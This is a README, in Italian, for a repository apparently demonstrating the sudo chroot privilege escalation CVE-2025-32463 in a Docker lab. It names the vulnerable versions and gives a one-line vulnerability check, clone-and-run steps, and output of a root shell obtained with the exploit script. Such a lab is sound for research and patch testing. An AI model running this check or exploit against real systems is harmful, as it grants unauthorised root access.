
Escalation dei privilegi a root tramite il binario sudo con l'opzione chroot. CVE-2025-32463
Questo repository fornisce un ambiente minimale e riproducibile per dimostrare la vulnerabilità di escalation dei privilegi CVE‑2025‑32463 nella funzionalità chroot di sudo.
Le build vulnerabili di sudo 1.9.14 fino a 1.9.17 (tutte le revisioni p) sulla maggior parte delle distribuzioni Linux sono affette.
Pagine di sicurezza
| File | Scopo |
|---|---|
| Dockerfile | Crea un'immagine Ubuntu 24.04 con sudo 1.9.16p2 vulnerabile e strumenti di compilazione |
| sudo‑chwoot.sh | Exploit proof‑of‑concept che genera una shell root all'interno del chroot |
| run.sh | Script helper che crea l'immagine (se necessario) e avvia il container dell'exploit |
# Vulnerabile sudo
pwn ~ $ sudo -R woot woot
sudo: woot: No such file or directory
# Patchato sudo
pwn ~ $ sudo -R woot woot
[sudo] password for pwn:
sudo: you are not permitted to use the -R option with woot
# 1 – clona il repo
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot
# 2 – crea ed esegui l'immagine Docker (con tag "sudo-chwoot")
$ ./run.sh
# 3 – esegui l'exploit nel container (esegue direttamente il comando root o ti apre una shell root)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh id
woot!
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
root@f722d9182d1f:/#
run.sh passa --privileged e --rm a Docker in modo che il container si pulisca da solo all'uscita.
Rimuovi l'immagine quando hai finito:
docker rmi sudo-chwoot